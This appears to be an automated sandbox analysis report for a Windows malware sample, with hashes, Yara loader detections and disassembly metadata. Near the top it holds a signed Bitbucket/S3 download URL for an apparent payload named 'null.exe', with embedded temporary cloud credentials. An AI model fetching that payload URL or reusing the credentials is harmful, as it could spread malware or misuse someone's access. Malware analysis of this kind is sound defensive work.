                                                                                    Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacup [TRUNCATED]
                                                                                    Expires: Thu, 12 Dec 2024 16:50:09 GMT
                                                                                    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                    X-Used-Mesh: False
                                                                                    Vary: Accept-Language, Origin
                                                                                    Content-Language: en
                                                                                    X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                    X-Dc-Location: Micros-3
                                                                                    X-Served-By: d397ebd10269
                                                                                    X-Version: b7875da02c7c
                                                                                    X-Static-Version: b7875da02c7c
                                                                                    X-Request-Count: 103
                                                                                    X-Render-Time: 0.040573835372924805
                                                                                    X-B3-Traceid: 5837c2a58023410ca1429fb6a7061188
                                                                                    X-B3-Spanid: bb6129318e7df079
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config- [TRUNCATED]
                                                                                    X-Usage-Quota-Remaining: 999246.334
                                                                                    X-Usage-Request-Cost: 765.67
                                                                                    X-Usage-User-Time: 0.019869
                                                                                    X-Usage-System-Time: 0.003101
                                                                                    X-Usage-Input-Ops: 0
                                                                                    X-Usage-Output-Ops: 0
                                                                                    Age: 0
                                                                                    X-Cache: MISS
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Xss-Protection: 1; mode=block
                                                                                    Atl-Traceid: 5837c2a58023410ca1429fb6a7061188
                                                                                    Atl-Request-Id: 5837c2a5-8023-410c-a142-9fb6a7061188
                                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                    Server-Timing: atl-edge;dur=149,atl-edge-internal;dur=3,atl-edge-upstream;dur=147,atl-edge-pop;desc="aws-eu-central-1"
                                                                                    Connection: close


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:11:49:52
                                                                                    Start date:12/12/2024
                                                                                    Path:C:\Users\user\Desktop\fIPSLgT0lO.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\fIPSLgT0lO.exe"
                                                                                    Imagebase:0xf70000
                                                                                    File size:606'720 bytes
                                                                                    MD5 hash:016D22F02AF7424E8D99C6C243ADCDB7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2930871276.0000000005B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2929425687.0000000004532000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2928319421.0000000003391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:11.2%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:31.8%
                                                                                      Total number of Nodes:22
                                                                                      Total number of Limit Nodes:1
                                                                                      execution_graph 32342 5bc24d8 32345 5bc24e3 32342->32345 32343 5bc270e 32344 5bc2590 KiUserExceptionDispatcher 32344->32345 32345->32343 32345->32344 32346 5bc2738 LdrInitializeThunk 32345->32346 32347 5bc2728 LdrInitializeThunk 32345->32347 32348 5bc283b LdrInitializeThunk 32345->32348 32346->32345 32347->32345 32348->32345 32349 197f620 32351 197f633 32349->32351 32353 197f6d8 32351->32353 32354 197f720 VirtualProtect 32353->32354 32356 197f6bb 32354->32356 32357 5bc6740 32358 5bc6756 32357->32358 32361 5bc2738 32358->32361 32360 5bc6777 32360->32360 32364 5bc275a 32361->32364 32362 5bc27ff LdrInitializeThunk 32363 5bc2815 32362->32363 32363->32360 32364->32362 32364->32363 32338 197f888 32339 197f8c8 CloseHandle 32338->32339 32341 197f8f9 32339->32341

                                                                                      Executed Functions

                                                                                      Function 05BA03C7 Relevance: 16.1, Strings: 12, Instructions: 1138COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,p$4$$p$$p$$p$$p$$p$$p$$p$$p$$p$$p
                                                                                      • API String ID: 0-142193208
                                                                                      • Opcode ID: fecf491485440a55b5cff9ffeaa9cb95caee617214e66fc9ad370a464a007bc1
                                                                                      • Instruction ID: b5104fc5850a1524c9b5db445deb1b06c71ec308618146185960a0734eb597f4
                                                                                      • Opcode Fuzzy Hash: fecf491485440a55b5cff9ffeaa9cb95caee617214e66fc9ad370a464a007bc1
                                                                                      • Instruction Fuzzy Hash: 82B2E535A042189FDB14DFA8C998FADB7B6FB88300F148199E505AB3A5DB71ED81CF50
                                                                                      Function 05BA06FF Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,p$4$$p$$p$$p$$p
                                                                                      • API String ID: 0-3956653638
                                                                                      • Opcode ID: c34b77a2789b16b752eb8fc2479cee2fcb63a7993177afc66a671ac242affb8e
                                                                                      • Instruction ID: 4fce1c51b8a559f2a0e90677656eb8ddc0e7b95d5b70d08045e42d98be9ac0a4
                                                                                      • Opcode Fuzzy Hash: c34b77a2789b16b752eb8fc2479cee2fcb63a7993177afc66a671ac242affb8e
                                                                                      • Instruction Fuzzy Hash: 4122E635A04219DFDB24DF64C988BADB7B6FF48300F1481D9E909AB2A5DB71AD81CF50
                                                                                      Function 05BA3808 Relevance: 3.2, Strings: 2, Instructions: 668COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Plp$$p
                                                                                      • API String ID: 0-2450700522
                                                                                      • Opcode ID: 22c489b3dd22f1264f9cf26338ff2cc0e10b2e90db5c13800fcc9d5cf16cc395
                                                                                      • Instruction ID: 3cb6d20d475f18eeb0d22272797281357cf9b2e0ee603d1962fc765ad6e696ea
                                                                                      • Opcode Fuzzy Hash: 22c489b3dd22f1264f9cf26338ff2cc0e10b2e90db5c13800fcc9d5cf16cc395
                                                                                      • Instruction Fuzzy Hash: 24423635B046058FCB14DF28C985A6AB7F6FF89311B2589A9E406CB3B5DB35EC42CB50
                                                                                      Function 05BC0B58 Relevance: 2.0, Strings: 1, Instructions: 736COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (p
                                                                                      • API String ID: 0-4175582459
                                                                                      • Opcode ID: 01b879b4b8d36ea52d6a3e1fe579dd9fd3d5c998994184db494a69b6270d4bff
                                                                                      • Instruction ID: 9d4d614b8e8a0953f9177bf15a8e01670dadba13679c60347610a175903f9224
                                                                                      • Opcode Fuzzy Hash: 01b879b4b8d36ea52d6a3e1fe579dd9fd3d5c998994184db494a69b6270d4bff
                                                                                      • Instruction Fuzzy Hash: DD526974B006068FCB19DFA9C498A6EBBF2FF88300F2485ADD55AD7351DB30A915CB94
                                                                                      Function 05BC2728 Relevance: 1.7, APIs: 1, Instructions: 156libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1e573cfcd4608866082722c8ff8a98f4ec1e75236127724059bce9617b9b63dd
                                                                                      • Instruction ID: c52155027f3365f1e6e882eb5e3689bda64b15947f06f34c0bff50c1d20bd7e5
                                                                                      • Opcode Fuzzy Hash: 1e573cfcd4608866082722c8ff8a98f4ec1e75236127724059bce9617b9b63dd
                                                                                      • Instruction Fuzzy Hash: FE516B38A08204CFDB14CB24D484BB9BBB3FB88315F1540FEE0869B654CB75AC85CB59
                                                                                      Function 05BC24C8 Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 05BC2594
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 33bf7fa53370c85893ec035278482ec9588bfbbd97234dfa0409dc0477b5968a
                                                                                      • Instruction ID: 50ef1c0f84f212f6045f2616c01b78837598c8d564c884932115b883a54179a8
                                                                                      • Opcode Fuzzy Hash: 33bf7fa53370c85893ec035278482ec9588bfbbd97234dfa0409dc0477b5968a
                                                                                      • Instruction Fuzzy Hash: 57514E343081018FC764EB68E499B7A33E6EB9C365F4600B9D49ACB369DF399D42C751
                                                                                      Function 05BC24D8 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 05BC2594
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID: DispatcherExceptionUser
                                                                                      • String ID:
                                                                                      • API String ID: 6842923-0
                                                                                      • Opcode ID: 1a4d269fe8440f348a1679dee5d4289ff8b06b9c7a87e6b61e3dfb7079610d4c
                                                                                      • Instruction ID: 2fc025723a94c90f0e495e1853b9ab80a3623607c5b9af0cb38383280c72d80c
                                                                                      • Opcode Fuzzy Hash: 1a4d269fe8440f348a1679dee5d4289ff8b06b9c7a87e6b61e3dfb7079610d4c
                                                                                      • Instruction Fuzzy Hash: B5512C343081018FC764EB68E499B7A33E6EB9C365F4600B9D49ACB359DF399D42C751
                                                                                      Function 05BC4A98 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \V]m
                                                                                      • API String ID: 0-4105700344
                                                                                      • Opcode ID: d7857c1039d8ecc3e6777a0fe1dadd20143c7db417774c45e2a6cc79cc08eccb
                                                                                      • Instruction ID: 2ecbd3d2d44dfaff49006752d16a13c44c8b379e4574b288bbbb6a9b09ad89d9
                                                                                      • Opcode Fuzzy Hash: d7857c1039d8ecc3e6777a0fe1dadd20143c7db417774c45e2a6cc79cc08eccb
                                                                                      • Instruction Fuzzy Hash: 08917B70E002098FCF10DFA8C9917AEBFF2FB88305F1481A8E415AB294DB34A945CB95
                                                                                      Function 0197F960 Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2928114863.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1970000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8=G
                                                                                      • API String ID: 0-4187469009
                                                                                      • Opcode ID: 30048cca23e91d1c6895ee2b8cc207089f4b8d6dcc1d5473d7c3b26c7f886fb6
                                                                                      • Instruction ID: 70b381dc2a0a963cf3971641894c77d75255b0d68e3fd442ea1d3b9ff49bc31b
                                                                                      • Opcode Fuzzy Hash: 30048cca23e91d1c6895ee2b8cc207089f4b8d6dcc1d5473d7c3b26c7f886fb6
                                                                                      • Instruction Fuzzy Hash: 11811770A04209DFCB44CFA8D498BADBBF5FF58305F108469D05AAB294DB7A9D85CF41
                                                                                      Function 05BCA8E0 Relevance: .4, Instructions: 389COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 184275ca4b2a4f72923b0baf1d40bcdb277f030a3c6cbca209490e22f9fdb21a
                                                                                      • Instruction ID: 9baece88d6b906d48dcfc1adc5563470e829eb64fd6a212c6bc23dd3b05c5f3c
                                                                                      • Opcode Fuzzy Hash: 184275ca4b2a4f72923b0baf1d40bcdb277f030a3c6cbca209490e22f9fdb21a
                                                                                      • Instruction Fuzzy Hash: 1FF14D30A04108CFD754CB69D495BAE7BB3FB88311F2580E9E4469B7A9CB75BD82CB44
                                                                                      Function 05BCA8D1 Relevance: .4, Instructions: 383COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fdc1c0f23e7656efe66f0bc4cd1f06bf78d3d2562130d40305f6eff61dbec1cb
                                                                                      • Instruction ID: ac35d55b61c294c50b509ed71ce79fb9134ccd80af261de8e4966d781a871b63
                                                                                      • Opcode Fuzzy Hash: fdc1c0f23e7656efe66f0bc4cd1f06bf78d3d2562130d40305f6eff61dbec1cb
                                                                                      • Instruction Fuzzy Hash: 57F14C30A04108DFD754CB69D485BAE7BB3FB88311F2980E9E4469B769CB75AD82CB44
                                                                                      Function 05BC7419 Relevance: .3, Instructions: 311COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 415a31c6b743188c92bec23e6a176cb2eeebc9fa63e5f20d5563622bd18eeedd
                                                                                      • Instruction ID: 30d1bd62fdf42ee98e2a72f493fb039c0b79024419715632fcd88fb7c2b2c872
                                                                                      • Opcode Fuzzy Hash: 415a31c6b743188c92bec23e6a176cb2eeebc9fa63e5f20d5563622bd18eeedd
                                                                                      • Instruction Fuzzy Hash: 55D1F430A042058FDB14DB68D594BBA7BB2FB88311F1585ECD4569B2A4EF35AD82CF84
                                                                                      Function 05BCD191 Relevance: .3, Instructions: 309COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 14738a3e5877285ccbc75eea964b69bb2ed5b680699f06b0736698a09912ef77
                                                                                      • Instruction ID: c49e3c7760e346cf3e39dd365223200934635895430c3930dbd9a550b69478d0
                                                                                      • Opcode Fuzzy Hash: 14738a3e5877285ccbc75eea964b69bb2ed5b680699f06b0736698a09912ef77
                                                                                      • Instruction Fuzzy Hash: 0CD18738A14242CFDB199F34D46876C7BB2FB89306F1085BEE4069B294DF35AC86CB44
                                                                                      Function 05BC7428 Relevance: .3, Instructions: 308COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7ed1d50f4d585d8124cfa28beffed00f103662dd17a4fff07af2d802a82a5dfa
                                                                                      • Instruction ID: 8a1ed7142ee6766efb01dafab08054b07f3c0d564837fbd2efcefa1b2d040fc3
                                                                                      • Opcode Fuzzy Hash: 7ed1d50f4d585d8124cfa28beffed00f103662dd17a4fff07af2d802a82a5dfa
                                                                                      • Instruction Fuzzy Hash: 21D1F430A042058FDB14DB68D544BBA7BB2FB88311F1585ECD4569B3A4EF35AD82CF84
                                                                                      Function 05BC56B0 Relevance: .3, Instructions: 266COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0545a8eac5b5ef519baaa8d0716a83f7f02721c83e484f6b5c81d3d79ef06f87
                                                                                      • Instruction ID: f720385faec3058649b9e56096517a70c6462705716a3ee550f96ea1356de659
                                                                                      • Opcode Fuzzy Hash: 0545a8eac5b5ef519baaa8d0716a83f7f02721c83e484f6b5c81d3d79ef06f87
                                                                                      • Instruction Fuzzy Hash: FDB12E70E00209DFDB24CFA9D8857ADBFF2FF48314F1485A9D415AB294EB74A885CB85
                                                                                      Function 05BC6B98 Relevance: .2, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0d7701e0484a298fca16b9499b8ec4752696539355f43926ef1bb60826f68ba5
                                                                                      • Instruction ID: 7a46556a43f808f2603df1a8f329292ae8f269d2cc29208c4a7041b74764d4a1
                                                                                      • Opcode Fuzzy Hash: 0d7701e0484a298fca16b9499b8ec4752696539355f43926ef1bb60826f68ba5
                                                                                      • Instruction Fuzzy Hash: 15917B30608115CFEB14DF68D459FBA7BA3FB89315F1580F9D0069B298DB39AD82CB58
                                                                                      Function 05BC6B8B Relevance: .2, Instructions: 228COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a142c85db034f64be2b5141eb0b1ab81aa3a926e3f6436df9b928b045c80471f
                                                                                      • Instruction ID: a85cb2a7989083224778edee3e79f8d52706dca1268e6e1b814f1b37023f8a1d
                                                                                      • Opcode Fuzzy Hash: a142c85db034f64be2b5141eb0b1ab81aa3a926e3f6436df9b928b045c80471f
                                                                                      • Instruction Fuzzy Hash: 4B917C30608115CFDB14CF68D459FBA7BA3FB89315F1580F9D0069B295DB35AC82CB58
                                                                                      Function 05BC8762 Relevance: .2, Instructions: 200COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 79c4e21e7522ea5c2cc7e1d408e74267d7d942466d1052d638efb796eeff7d33
                                                                                      • Instruction ID: eb87a4c2a7d9639a9fdc06cb48518fedcdf74763259de96c0c225499b619999b
                                                                                      • Opcode Fuzzy Hash: 79c4e21e7522ea5c2cc7e1d408e74267d7d942466d1052d638efb796eeff7d33
                                                                                      • Instruction Fuzzy Hash: DD911630A08209CFEB24CF54D544BBABBB3FB84301F2581EDE4056B655D775AD82CB48
                                                                                      Function 05BC6E15 Relevance: .1, Instructions: 141COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9e43c52dc69111b349de6f8a9c6985eec0b8cdbc6a2ac820961ab107b403c4ca
                                                                                      • Instruction ID: 405614126ac9690f575fd2c09802f98450929b3ce6c5d59ad3ba9bc0892702e4
                                                                                      • Opcode Fuzzy Hash: 9e43c52dc69111b349de6f8a9c6985eec0b8cdbc6a2ac820961ab107b403c4ca
                                                                                      • Instruction Fuzzy Hash: C5513830A08115CFEB14CF58D449FBA7BA3FB89305F5580E9C0069B655DB79AD81CB58
                                                                                      Function 05BA7A08 Relevance: 7.9, Strings: 6, Instructions: 403COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 628 5ba7a08-5ba7a54 632 5ba7a5a-5ba7a6c 628->632 633 5ba7bd2-5ba7c3e 628->633 636 5ba7a6e-5ba7aba 632->636 637 5ba7abc-5ba7b05 632->637 645 5ba7e8d-5ba7e94 633->645 646 5ba7c44-5ba7c4d 633->646 669 5ba7b08-5ba7b1c 636->669 637->669 649 5ba7c4f-5ba7c53 646->649 650 5ba7cc3-5ba7cdc 646->650 653 5ba7c6c-5ba7c78 649->653 654 5ba7c55-5ba7c6a 649->654 663 5ba7e09-5ba7e19 650->663 664 5ba7ce2 650->664 655 5ba7c81-5ba7cbe 653->655 654->655 655->645 676 5ba7e1b-5ba7e30 663->676 677 5ba7e32-5ba7e3e 663->677 665 5ba7ce9-5ba7d2c 664->665 666 5ba7d79-5ba7dbc 664->666 667 5ba7d31-5ba7d74 664->667 668 5ba7dc1-5ba7e04 664->668 665->645 666->645 667->645 668->645 671 5ba7b27-5ba7b48 669->671 683 5ba7b4a-5ba7b50 671->683 684 5ba7b52-5ba7b5c 671->684 678 5ba7e47-5ba7e88 676->678 677->678 678->645 685 5ba7b5f-5ba7ba2 683->685 684->685 692 5ba7bc8-5ba7bcf 685->692 693 5ba7ba4-5ba7bc0 685->693 693->692
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (p$4'p$4'p$4'p$4'p$pp
                                                                                      • API String ID: 0-2991777393
                                                                                      • Opcode ID: 4959729edad30c16f2b181e0a84112da39e322871fcc7c5f6b53d7be4389e6b0
                                                                                      • Instruction ID: 3ecfdbfeea084a192f7e6437a707e4539893cc4ee955ecc827981ab8adcc36d7
                                                                                      • Opcode Fuzzy Hash: 4959729edad30c16f2b181e0a84112da39e322871fcc7c5f6b53d7be4389e6b0
                                                                                      • Instruction Fuzzy Hash: BDD13D32A042159FCB09DF64C844EA9BBB6FF8C310F0545D8E509AB272DB72ED56DB90
                                                                                      Function 05BA6B40 Relevance: 4.2, Strings: 3, Instructions: 472COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
